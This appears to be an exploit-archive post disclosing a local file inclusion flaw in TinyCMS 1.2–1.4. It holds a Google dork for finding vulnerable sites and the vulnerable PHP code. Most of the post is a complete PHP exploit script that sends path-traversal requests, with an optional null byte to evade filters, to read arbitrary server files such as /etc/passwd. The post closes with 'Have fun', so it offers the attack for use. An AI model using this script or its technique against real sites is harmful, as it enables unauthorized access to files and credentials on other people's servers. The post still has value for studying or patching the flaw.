Home / exploits TinyCMS 1.4 Local File Inclusion
Posted on 10 October 2012
[+] Exploit title: TinyCMS - Local File Inclusion [+] Date: 2/10/2012 [+] Author: Phizo [+] Vendor: http://www.tinycms.net/ [+] Version: 1.2 - 1.4 [+] Category: webapps [+] Google dork: intext:"Powered by TinyCMS" [+] Tested on: Windows 7 | Firefox 15.0.1 All current versions of TinyCMS seem to be affected by the following local file inclusion vulnerability. TinyCMS 1.0 and 1.1 are no longer available on the developer's website, however 1.2 to 1.4 remain today and are vulnerable. The option for omitting or including the null byte in the request was included because some web servers may have a WAF (Web Application Firewall) installed and/or magic quotes installed which may prevent inclusion of the desired file. The Google dork provided currently produces "About 4,510 results". The vulnerable code along with an exploit has been included. Have fun. ======================== index.php ~ lines 23-44 ======================== if(!isset($_SERVER['HTTP_X_REQUESTED_WITH'])) { ob_start(); @include 'tpl/wsl.tpl'; $page_content = ob_get_contents(); ob_end_clean(); echo $page_content; } else { header('content-type: application/json; charset=utf-8'); $page_data = array('pageName' => $_GET['page'], 'content' => ''); ob_start(); @include 'tpl/' . $_GET['page'] . '.html'; $page_data['content'] = ob_get_contents(); ob_end_clean(); echo json_encode($page_data); } } ================= Exploit code ================= <?php # TinyCMS - Local File Inclusion # http://hackforums.net/member.php?action=profile&uid=42381 echo <<<EOT __________________________________ TinyCMS - Local File Inclusion / / Author: Phizo __________________________________ EOT; $options = getopt('u:f:o:n::'); if(!isset($options['u'], $options['f'])) die(" Usage example: php tinycms.php -u http://target.com/ -f /etc/passwd -u http://target.com/ The full path to TinyCMS. -f /etc/passwd The file to include. -o source.txt The output file to write to. [Optional] -n Omit null byte from request. [Optional] "); $url = $options['u']; $file = $options['f']; $output = @$options['o']; $null = @$options['n']; $url = !isset($null) ? "{$url}?page=../{$file}%00" : "{$url}?page=../{$file}"; $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 'X-Requested-With: XMLHttpRequest'); echo " [+] URL -> {$options['u']} "; echo !isset($null) ? "[+] File -> {$file} " : "[+] File -> {$file}.html "; echo !isset($null) ? "[+] Null byte -> included " : "[+] Null byte -> omitted "; echo " [+] Submitting request... "; $handle = curl_init(); curl_setopt($handle, CURLOPT_URL, $url); curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $json = curl_exec($handle); curl_close($handle); $source = json_decode($json, true); echo "______________________________________________ "; if(!empty($source['content'])) { if(!isset($output)) echo "{$source['content']} "; else file_put_contents($output, $source['content']); } else { die(" [+] File could not be included. "); } echo " [+] Exploit completed. "; ?>
